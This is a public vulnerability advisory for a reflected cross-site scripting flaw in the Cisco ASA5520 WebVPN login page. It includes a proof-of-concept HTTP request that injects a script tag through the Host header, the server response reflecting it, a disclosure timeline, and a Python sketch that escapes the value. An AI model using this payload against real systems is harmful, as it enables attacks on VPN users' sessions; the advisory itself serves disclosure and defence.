Cisco ASA5520 Web VPN Host Header XSS

2009.04.01
Credit: Bugs NotHugs
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=

Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!-- Copyright (c) 2004, 2005 by Cisco Systems, Inc. All rights reserved. -->
<head>
<META http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North America Server" for "http://"'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org/+webvpn+/index.html" on "2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>
<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>

- Solution

None

- Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)
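The response above shows the Host header copied verbatim into the single-quoted content attribute of the PICS-Label META tag. The following is an added example, not code from the advisory or from Cisco: it rebuilds that tag the way the response implies and beside it a hardened form that validates the Host syntax and HTML-escapes it. The function names and the fallback name vpn.example.test are assumptions made for illustration.

```python
import html
import re

# Host header value taken from the advisory's modified request.
POC_HOST = ("\"'><script>alert('BugsNotHugs')</script>"
            "<meta httpequiv=\"\" content='\"www.owasp.org")

# Conservative Host syntax: DNS name or IPv4 literal plus optional port.
# IPv6 literals are deliberately left out of this sketch.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*(?::\d{{1,5}})?")

# Tag layout reconstructed from the response shown in the advisory.
PICS_TEMPLATE = (
    "<META http-equiv=\"PICS-Label\" content='(PICS-1.1 "
    "\"http://www.rsac.org/ratingsv01.html\" l gen true comment "
    "\"RSACi North America Server\" for \"http://{host}/+webvpn+/index.html\" "
    "on \"2000.11.02T23:36-0800\" r (n 0 s 0 v 0 l 0))'>"
)


def render_vulnerable(host: str) -> str:
    """Behaviour implied by the response: Host is reflected unmodified."""
    return PICS_TEMPLATE.format(host=host)


def valid_host(host: str) -> bool:
    """Accept only values that look like a hostname or IPv4 address."""
    return len(host) <= 255 and HOST_RE.fullmatch(host) is not None


def render_hardened(host: str, configured_name: str = "vpn.example.test") -> str:
    """Use the configured name when Host is malformed, and escape either way."""
    if not valid_host(host):
        host = configured_name  # assumed fallback; never echo a rejected value
    # quote=True also encodes ' and ", so the value cannot close the attribute.
    return PICS_TEMPLATE.format(host=html.escape(host, quote=True))


if __name__ == "__main__":
    print(render_vulnerable(POC_HOST))
    print(render_hardened(POC_HOST))
```
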


Copyright 2024, cxsecurity.com

 
